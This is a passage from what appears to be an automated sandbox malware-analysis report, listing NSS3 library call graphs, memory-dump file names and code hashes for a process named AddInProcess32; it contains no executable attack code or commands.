                                                                                        • Part of subcall function 6CD1C6C7: PR_Unlock.NSS3(?,00000000,00000000,?,6CCE3248,00000000,00000008,?,00000000,?,?,6CCDCC16,00000000,?,?,?), ref: 6CD1C732
                                                                                        • Part of subcall function 6CD1C6C7: PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,?,6CCE3248,00000000,00000008,?,00000000,?,?,6CCDCC16,00000000), ref: 6CD1C77B
                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C,00000000,?,?,00000000,?,6CD3F3B2,00000000,?,?,6CD3EE10,00000000,?,?,?), ref: 6CCE4F68
                                                                                        • Part of subcall function 6CD1C6C7: PL_ArenaAllocate.NSS3(?,?,00000000,00000000,?,6CCE3248,00000000,00000008,?,00000000,?,?,6CCDCC16,00000000), ref: 6CD1C71E
                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,00000000,?,00000000,?,?,00000000,?,6CD3F3B2,00000000,?,?,6CD3EE10,00000000,?,?), ref: 6CCE4F85
                                                                                      • PORT_SetError_Util.NSS3(FFFFE013,00000000,?,?,00000000,?,6CD3F3B2,00000000,?,?,6CD3EE10,00000000,?,?,?), ref: 6CCE4FB1
                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000,00000000,?,?,00000000,?,6CD3F3B2,00000000,?,?,6CD3EE10,00000000,?,?,?), ref: 6CCE4FBE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Arena$Alloc_Arena_Error$AllocateCopyError_FreeItem_LockUnlock
                                                                                      • String ID:
                                                                                      • API String ID: 2597062611-0
                                                                                      • Opcode ID: e1238a2c024f6cf400a90bcb8b5a1dcea007a6d8d57195e3f2174e2a3df1fe1e
                                                                                      • Instruction ID: d7291f8399fc9624704d28ba821c81bdc664aaf3752ea8b6c87bbfe0c1933be9
                                                                                      • Opcode Fuzzy Hash: e1238a2c024f6cf400a90bcb8b5a1dcea007a6d8d57195e3f2174e2a3df1fe1e
                                                                                      • Instruction Fuzzy Hash: 0711EB7270D6116FE705DFD9E840A9A7BD8DF86668B20402EE9049FF50EB30D90087A8
                                                                                      APIs
                                                                                      • PR_GetDirectorySepartor.NSS3(?,00000000,?,6CD1BE8C,00000000,?), ref: 6CD1BED1
                                                                                      • strrchr.VCRUNTIME140(?,00000000,?,00000000,?,6CD1BE8C,00000000,?), ref: 6CD1BEDE
                                                                                      • PORT_Alloc_Util.NSS3(?,?,00000000,?,6CD1BE8C,00000000,?), ref: 6CD1BF06
                                                                                      • memcpy.VCRUNTIME140(00000000,?,?,?,00000000,?,6CD1BE8C,00000000,?), ref: 6CD1BF17
                                                                                      • PR_LoadLibraryWithFlags.NSS3(?,?,?,?,?,?,6CD1BE8C,00000000,?), ref: 6CD1BF43
                                                                                      • PORT_Free_Util.NSS3(00000000,?,?,?,?,?,?,6CD1BE8C,00000000,?), ref: 6CD1BF4D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Alloc_DirectoryFlagsFree_LibraryLoadSepartorWithmemcpystrrchr
                                                                                      • String ID:
                                                                                      • API String ID: 2175226939-0
                                                                                      • Opcode ID: 7f143ca6b81a1ebcd912f4a77349e1ecc9b2a13b892300358b07d8c1be86cdce
                                                                                      • Instruction ID: 60ac20b63a2fdfb03c44082de079151cd00f2da5e543a6211222f0831acdf09b
                                                                                      • Opcode Fuzzy Hash: 7f143ca6b81a1ebcd912f4a77349e1ecc9b2a13b892300358b07d8c1be86cdce
                                                                                      • Instruction Fuzzy Hash: EC119BB3908214AFDF01DF78E8446EE7BB8EF42214B104168ED499BB11D7329A098BA0
                                                                                      APIs
                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6CCEAFB5
                                                                                        • Part of subcall function 6CD1CA68: PR_SetError.NSS3(FFFFE013,00000000,?,6CCE3237,00000800,?,?,6CCDCC16,00000000,?,?,?,?,?,6CCDC216,?), ref: 6CD1CA7B
                                                                                      • PORT_ArenaZAlloc_Util.NSS3(00000000,0000001C), ref: 6CCEAFC4
                                                                                        • Part of subcall function 6CD1C92F: PORT_ArenaAlloc_Util.NSS3(00000000,00000000,?,?,?,6CCE31E3,00000000,00000018,?,00000000,?,6CCDCBFF,?), ref: 6CD1C943
                                                                                        • Part of subcall function 6CD1C92F: memset.VCRUNTIME140(00000000,00000000,00000000,?,?,?,6CCE31E3,00000000,00000018,?,00000000,?,6CCDCBFF,?), ref: 6CD1C954
                                                                                      • PK11_ReferenceSlot.NSS3(00000000), ref: 6CCEAFDC
                                                                                      • PORT_SetError_Util.NSS3(FFFFE013), ref: 6CCEB022
                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CCEB02B
                                                                                      • PORT_SetError_Util.NSS3(FFFFE005), ref: 6CCEB038
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Alloc_ArenaArena_Error_$ErrorFreeK11_ReferenceSlotmemset
                                                                                      • String ID:
                                                                                      • API String ID: 2758286969-0
                                                                                      • Opcode ID: 6563cb992fb77e79658623131550eae3b7f04a9fef4483e0dc3b48cdea91150b
                                                                                      • Instruction ID: e43703e2b75e63a753bab4147aa9d377dacace252f37abbd48c4fd8c44c10884
                                                                                      • Opcode Fuzzy Hash: 6563cb992fb77e79658623131550eae3b7f04a9fef4483e0dc3b48cdea91150b
                                                                                      • Instruction Fuzzy Hash: 6311B7B6109B029FD3249F69E890B11B3E4FF49624B20452ED06587F50E771F455CB68
                                                                                      APIs
                                                                                      • PORT_ArenaMark_Util.NSS3(00000000,?,00000000,00000000,?,6CD2C559,00000000,?,00000000,00000000,-0000001A,-0000001A,?,6CD2A8D2), ref: 6CD2BDA9
                                                                                        • Part of subcall function 6CD1C8A6: PR_Lock.NSS3(?,?,?,?,6CD1B9B6,?,?,?,6CCDCB3B,00000000,?,6CCDD2B9,?,?,6CCDCB3B,?), ref: 6CD1C8BA
                                                                                        • Part of subcall function 6CD1C8A6: PR_Unlock.NSS3(?,?,6CD1B9B6,?,?,?,6CCDCB3B,00000000,?,6CCDD2B9,?,?,6CCDCB3B,?,?,00000000), ref: 6CD1C8C9
                                                                                      • PORT_ArenaZAlloc_Util.NSS3(00000000,00000018,00000000,?,00000000,00000000,?,6CD2C559,00000000,?,00000000,00000000,-0000001A,-0000001A,?,6CD2A8D2), ref: 6CD2BDB4
                                                                                        • Part of subcall function 6CD1C92F: PORT_ArenaAlloc_Util.NSS3(00000000,00000000,?,?,?,6CCE31E3,00000000,00000018,?,00000000,?,6CCDCBFF,?), ref: 6CD1C943
                                                                                        • Part of subcall function 6CD1C92F: memset.VCRUNTIME140(00000000,00000000,00000000,?,?,?,6CCE31E3,00000000,00000018,?,00000000,?,6CCDCBFF,?), ref: 6CD1C954
                                                                                      • SECOID_SetAlgorithmID_Util.NSS3(00000000,00000000,00000000,00000000,?,00000000,00000000,-0000001A,-0000001A,?,6CD2A8D2), ref: 6CD2BDC9
                                                                                        • Part of subcall function 6CD18C34: SECOID_FindOIDByTag_Util.NSS3(?,00000000,?,6CCE8B15,?,00000000,00000004,00000000), ref: 6CD18C3C
                                                                                        • Part of subcall function 6CD18C34: PORT_SetError_Util.NSS3(FFFFE006,00000000,?,6CCE8B15,?,00000000,00000004,00000000), ref: 6CD18C4B
                                                                                        • Part of subcall function 6CD28CDD: PORT_ArenaAlloc_Util.NSS3(00000000,00000008,00000000,?,?,6CD2BDE0,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 6CD28CF8
                                                                                      • PT_FPrintStats.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,-0000001A), ref: 6CD2BDFF
                                                                                      • PORT_ArenaRelease_Util.NSS3(00000000,?,?,00000000,00000000,-0000001A,-0000001A,?,6CD2A8D2), ref: 6CD2BE0D
                                                                                      • PORT_SetError_Util.NSS3(FFFFE005,?,00000000,00000000,?,6CD2C559,00000000,?,00000000,00000000,-0000001A,-0000001A,?,6CD2A8D2), ref: 6CD2BE1A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Arena$Alloc_$Error_$AlgorithmFindLockMark_PrintRelease_StatsTag_Unlockmemset
                                                                                      • String ID:
                                                                                      • API String ID: 4210699717-0
                                                                                      • Opcode ID: 7356aff53b8ebc6059503b2cb47d53f3e13d64c1c29e65ab308f1726e735ab7b
                                                                                      • Instruction ID: 7bc61004be2317ee8a15cbe150d767a3ec4b2f242ee25d38679bc4443557c482
                                                                                      • Opcode Fuzzy Hash: 7356aff53b8ebc6059503b2cb47d53f3e13d64c1c29e65ab308f1726e735ab7b
                                                                                      • Instruction Fuzzy Hash: 8B01267650A6197BD7012F696C40FDF339C9F9122CF104125FF18A5EA0F7A9DA1446F1
                                                                                      APIs
                                                                                        • Part of subcall function 6CD46AC0: PR_GetIdentitiesLayer.NSS3(?,?,6CD2E3A3,?), ref: 6CD46ACC
                                                                                        • Part of subcall function 6CD46AC0: PORT_SetError_Util.NSS3(FFFFE891,?), ref: 6CD46ADF
                                                                                      • PORT_SetError_Util.NSS3(FFFFE005), ref: 6CD45C53
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      • PR_EnterMonitor.NSS3(?), ref: 6CD45C69
                                                                                      • PR_EnterMonitor.NSS3(?), ref: 6CD45C7F
                                                                                      • PORT_SetError_Util.NSS3(FFFFE005), ref: 6CD45C96
                                                                                      • PR_ExitMonitor.NSS3(?), ref: 6CD45CBC
                                                                                      • PR_ExitMonitor.NSS3(?), ref: 6CD45CCE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Monitor$Error_Util$EnterExit$ErrorIdentitiesLayer
                                                                                      • String ID:
                                                                                      • API String ID: 638915434-0
                                                                                      • Opcode ID: 46a731bc952ddd9993f46f2cf5856b5a62763e706fc78f42bfe10507cf1debc2
                                                                                      • Instruction ID: bbfcf8687fd7163aae5a7f2f65c0e3197cb76f4620398dbc1882f80589c5e792
                                                                                      • Opcode Fuzzy Hash: 46a731bc952ddd9993f46f2cf5856b5a62763e706fc78f42bfe10507cf1debc2
                                                                                      • Instruction Fuzzy Hash: 2B112332109B00DBD7201F66DD04687B7B5EF4273DF34861FE75691DB0EB3268598AA0
                                                                                      APIs
                                                                                      • SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000018,?,6CD21875,00000000,?,6CD22A82,6CD21969,0474C085,00000001,00000000,?), ref: 6CD0C91D
                                                                                        • Part of subcall function 6CD1B99E: PORT_ArenaMark_Util.NSS3(?,?,?,6CCDCB3B,00000000,?,6CCDD2B9,?,?,6CCDCB3B,?,?,00000000,?,6CCDCB3B,?), ref: 6CD1B9B1
                                                                                        • Part of subcall function 6CD1B99E: PORT_ArenaZAlloc_Util.NSS3(?,0000000C,?,?,6CCDCB3B,00000000,?,6CCDD2B9,?,?,6CCDCB3B,?,?,00000000,?,6CCDCB3B), ref: 6CD1B9C8
                                                                                        • Part of subcall function 6CD1B99E: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,6CCDCB3B,00000000,?,6CCDD2B9,?,?,6CCDCB3B,?,?,00000000,?,6CCDCB3B), ref: 6CD1B9F0
                                                                                        • Part of subcall function 6CD1B99E: PORT_ArenaRelease_Util.NSS3(?,00000000,?,?,6CCDCB3B,00000000,?,6CCDD2B9,?,?,6CCDCB3B,?,?,00000000,?,6CCDCB3B), ref: 6CD1BA12
                                                                                      • PORT_ZAlloc_Util.NSS3(?,00000000,?), ref: 6CD0C93E
                                                                                        • Part of subcall function 6CD1CC25: PR_Calloc.NSS3(00000001,00000001,?,?,6CD1CA8F,00000024,?,?,6CCE3237,00000800,?,?,6CCDCC16,00000000), ref: 6CD1CC41
                                                                                        • Part of subcall function 6CD1CC25: PR_SetError.NSS3(FFFFE013,00000000,?,?,6CD1CA8F,00000024,?,?,6CCE3237,00000800,?,?,6CCDCC16,00000000), ref: 6CD1CC56
                                                                                      • memcpy.VCRUNTIME140(00000000,?,?,00000000,?), ref: 6CD0C952
                                                                                      • PORT_ZAlloc_Util.NSS3(?,00000000,?,?,00000000,?), ref: 6CD0C963
                                                                                      • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,00000000,?), ref: 6CD0C979
                                                                                      • PORT_ZFree_Util.NSS3(00000000,0000000C,?,00000000,?), ref: 6CD0C99A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Alloc_Arena$memcpy$AllocCallocErrorFree_Item_Mark_Release_
                                                                                      • String ID:
                                                                                      • API String ID: 2278377950-0
                                                                                      • Opcode ID: d474ad1240d875bc8004592511ace10c6f604f288283cbccdf2e57bd2c021c13
                                                                                      • Instruction ID: c903ffabf8940e45453262763ef05dbfc66eca08dcb5e881491ec10c01c0687e
                                                                                      • Opcode Fuzzy Hash: d474ad1240d875bc8004592511ace10c6f604f288283cbccdf2e57bd2c021c13
                                                                                      • Instruction Fuzzy Hash: 8B119171600B01ABDB10AF68EC80B86B7A5FF44614F048421EA0C9FB61E731E824CBF1
                                                                                      APIs
                                                                                      • PORT_ArenaMark_Util.NSS3(00000000,6CCE8D09,6CCE8D09,00000000,?,6CCE89A0,00000000,6CCE8D09,?,00000000,00000000,?,6CCEA1EE,00000000,0000001C,3D14E829), ref: 6CCE89CB
                                                                                        • Part of subcall function 6CD1C8A6: PR_Lock.NSS3(?,?,?,?,6CD1B9B6,?,?,?,6CCDCB3B,00000000,?,6CCDD2B9,?,?,6CCDCB3B,?), ref: 6CD1C8BA
                                                                                        • Part of subcall function 6CD1C8A6: PR_Unlock.NSS3(?,?,6CD1B9B6,?,?,?,6CCDCB3B,00000000,?,6CCDD2B9,?,?,6CCDCB3B,?,?,00000000), ref: 6CD1C8C9
                                                                                      • PORT_ArenaZAlloc_Util.NSS3(00000000,00000010,00000000,6CCE8D09,6CCE8D09,00000000,?,6CCE89A0,00000000,6CCE8D09,?,00000000,00000000,?,6CCEA1EE,00000000), ref: 6CCE89D5
                                                                                        • Part of subcall function 6CD1C92F: PORT_ArenaAlloc_Util.NSS3(00000000,00000000,?,?,?,6CCE31E3,00000000,00000018,?,00000000,?,6CCDCBFF,?), ref: 6CD1C943
                                                                                        • Part of subcall function 6CD1C92F: memset.VCRUNTIME140(00000000,00000000,00000000,?,?,?,6CCE31E3,00000000,00000018,?,00000000,?,6CCDCBFF,?), ref: 6CD1C954
                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,00000000,?,6CCE8D09,00000000,?), ref: 6CCE89EC
                                                                                        • Part of subcall function 6CD1BB68: PORT_ArenaAlloc_Util.NSS3(?,?,?,6CCDCAF2,?,6CD16CFC,?,?,00000000,?,?,00000000), ref: 6CD1BB8E
                                                                                      • SECITEM_ArenaDupItem_Util.NSS3(00000000,00000000,?,?,?,6CCE8D09,00000000,?), ref: 6CCE8A05
                                                                                      • PORT_ArenaRelease_Util.NSS3(00000000,00000000,6CCE8D09,00000000,?), ref: 6CCE8A1D
                                                                                      • PT_FPrintStats.NSS3(00000000,00000000,?,?,?,6CCE8D09,00000000,?), ref: 6CCE8A35
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Arena$Alloc_$Item_$CopyLockMark_PrintRelease_StatsUnlockmemset
                                                                                      • String ID:
                                                                                      • API String ID: 3892779706-0
                                                                                      • Opcode ID: b3b191ad89bd3faaded41f527fe076db578ce71dcc1080b1284f95f5b5b9b68c
                                                                                      • Instruction ID: e4307ed04439119fdb5dd5e66cb395a892991fb438b0bcd66c105dbe9e768214
                                                                                      • Opcode Fuzzy Hash: b3b191ad89bd3faaded41f527fe076db578ce71dcc1080b1284f95f5b5b9b68c
                                                                                      • Instruction Fuzzy Hash: 5001D6711187157FD3009B29EC40F9AB3D8EF49338F14C126F41887A91E735E955CBA8
                                                                                      APIs
                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6CCE4DF6
                                                                                        • Part of subcall function 6CD1CA68: PR_SetError.NSS3(FFFFE013,00000000,?,6CCE3237,00000800,?,?,6CCDCC16,00000000,?,?,?,?,?,6CCDC216,?), ref: 6CD1CA7B
                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CCE4E05
                                                                                        • Part of subcall function 6CD1C6C7: PR_Lock.NSS3(?,?,00000000,00000000,?,6CCE3248,00000000,00000008,?,00000000,?,?,6CCDCC16,00000000), ref: 6CD1C6F4
                                                                                        • Part of subcall function 6CD1C6C7: PR_Unlock.NSS3(?,00000000,00000000,?,6CCE3248,00000000,00000008,?,00000000,?,?,6CCDCC16,00000000,?,?,?), ref: 6CD1C732
                                                                                        • Part of subcall function 6CD1C6C7: PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,?,6CCE3248,00000000,00000008,?,00000000,?,?,6CCDCC16,00000000), ref: 6CD1C77B
                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CCE4E15
                                                                                        • Part of subcall function 6CD1C6C7: PL_ArenaAllocate.NSS3(?,?,00000000,00000000,?,6CCE3248,00000000,00000008,?,00000000,?,?,6CCDCC16,00000000), ref: 6CD1C71E
                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,00000000,?), ref: 6CCE4E2B
                                                                                        • Part of subcall function 6CD1BB68: PORT_ArenaAlloc_Util.NSS3(?,?,?,6CCDCAF2,?,6CD16CFC,?,?,00000000,?,?,00000000), ref: 6CD1BB8E
                                                                                      • PORT_SetError_Util.NSS3(FFFFE013), ref: 6CCE4E4A
                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CCE4E57
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Arena$Alloc_$Arena_Error$AllocateCopyError_FreeItem_LockUnlock
                                                                                      • String ID:
                                                                                      • API String ID: 1122068549-0
                                                                                      • Opcode ID: a10211eaf7f823634e4b9e3b4e668bb854a1f70f37a2e8a17434ed6394b151a6
                                                                                      • Instruction ID: 753e55ef6fdef187448ded59a38cc22d0037523aee6412b55e9f30bdad82eaf9
                                                                                      • Opcode Fuzzy Hash: a10211eaf7f823634e4b9e3b4e668bb854a1f70f37a2e8a17434ed6394b151a6
                                                                                      • Instruction Fuzzy Hash: 9DF0237320DA226AF115A795BC01F5B97488F83A78F20412AE5145BFD0FF55D40483F8
                                                                                      APIs
                                                                                      • PR_NewMonitor.NSS3(?,?,?,6CD47264,00000000,?,00000000), ref: 6CD46F34
                                                                                      • PR_NewMonitor.NSS3(?,?,?,6CD47264,00000000,?,00000000), ref: 6CD46F43
                                                                                        • Part of subcall function 6CD169D9: PR_Calloc.NSS3(00000001,00000028,00000000,?,6CCE0593,00000000,00000000,?,6CCE699C,00000000,?,6CCE0F05,?,00000000,00000000,00000000), ref: 6CD169E1
                                                                                        • Part of subcall function 6CD169D9: PR_NewLock.NSS3(?,00000000,00000000,00000000,?,6CCE699C,00000000,?,6CCE0F05,?,00000000,00000000,00000000,?,00000001), ref: 6CD169F5
                                                                                        • Part of subcall function 6CD169D9: PR_NewCondVar.NSS3(00000000,?,6CCE0F05,?,00000000,00000000,00000000,?,00000001,?,6CCDFDC8,00000001,?,00000000,00000001,00000001), ref: 6CD16A08
                                                                                        • Part of subcall function 6CD169D9: PR_NewCondVar.NSS3(00000000,6CCE0F05,?,00000000,00000000,00000000,?,00000001,?,6CCDFDC8,00000001,?,00000000,00000001,00000001,00000000), ref: 6CD16A14
                                                                                        • Part of subcall function 6CD169D9: PR_Malloc.NSS3(00000002,6CCDFDC8,00000001,?,00000000,00000001,00000001,00000000,6CCE14D2,00000001,00000055,00000000,00000001,?,6CCE699C), ref: 6CD16A39
                                                                                      • PR_NewMonitor.NSS3(?,?,?,6CD47264,00000000,?,00000000), ref: 6CD46F67
                                                                                      • PR_NewMonitor.NSS3(?,?,?,6CD47264,00000000,?,00000000), ref: 6CD46F73
                                                                                      • PR_NewLock.NSS3 ref: 6CD46F95
                                                                                      • PR_NewLock.NSS3 ref: 6CD46FA1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Monitor$Lock$Cond$CallocMalloc
                                                                                      • String ID:
                                                                                      • API String ID: 1286861124-0
                                                                                      • Opcode ID: 3f7f3bdbb204a9438cd43ac83f455c7136decdf0085a6c808b45419d6de68c30
                                                                                      • Instruction ID: e41a1970301972da1fa021636644a0d6f76163bb7dafb7703b6749afdd1563f9
                                                                                      • Opcode Fuzzy Hash: 3f7f3bdbb204a9438cd43ac83f455c7136decdf0085a6c808b45419d6de68c30
                                                                                      • Instruction Fuzzy Hash: 83014431115B16D6EB11AB7B9C0039AF6DC9F41764F20442BD7AAC66B0DF70E0418E60
                                                                                      APIs
                                                                                      • PR_Lock.NSS3 ref: 6CCC5FED
                                                                                        • Part of subcall function 6CCD98BD: EnterCriticalSection.KERNEL32(?,774CDF20,00000000,?,6CCD9FF0,?,?,?,?,?,?,?,6CCC7CFB,00000000,?,6CCD411D), ref: 6CCD98D0
                                                                                      • PR_WaitCondVar.NSS3(000000FF), ref: 6CCC5FFF
                                                                                      • PR_Unlock.NSS3 ref: 6CCC6022
                                                                                      • PR_Lock.NSS3(?), ref: 6CCC603A
                                                                                      • PR_NotifyAllCondVar.NSS3(?), ref: 6CCC6052
                                                                                      • PR_Unlock.NSS3 ref: 6CCC6066
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: CondLockUnlock$CriticalEnterNotifySectionWait
                                                                                      • String ID:
                                                                                      • API String ID: 1381441139-0
                                                                                      • Opcode ID: 29b660084c9c83c15f3cdf2ad34b26b2c2cd9316a5d9029a47f70b4a53a0e349
                                                                                      • Instruction ID: e4c76367e511c226ee24d88b846d8889295367d45198d8e16b0b335df3b60819
                                                                                      • Opcode Fuzzy Hash: 29b660084c9c83c15f3cdf2ad34b26b2c2cd9316a5d9029a47f70b4a53a0e349
                                                                                      • Instruction Fuzzy Hash: 720184753002009BDF145F29DE1095537B5FB867283254369E2398ABE0EF32E803DB40
                                                                                      APIs
                                                                                      • PORT_Free_Util.NSS3(00000000,?,?,00000000,?,6CCFE5A8,00000000,00000001), ref: 6CCFDEA8
                                                                                      • PK11_FreeSymKey.NSS3(00000000,?,?,00000000,?,6CCFE5A8,00000000,00000001), ref: 6CCFDEB7
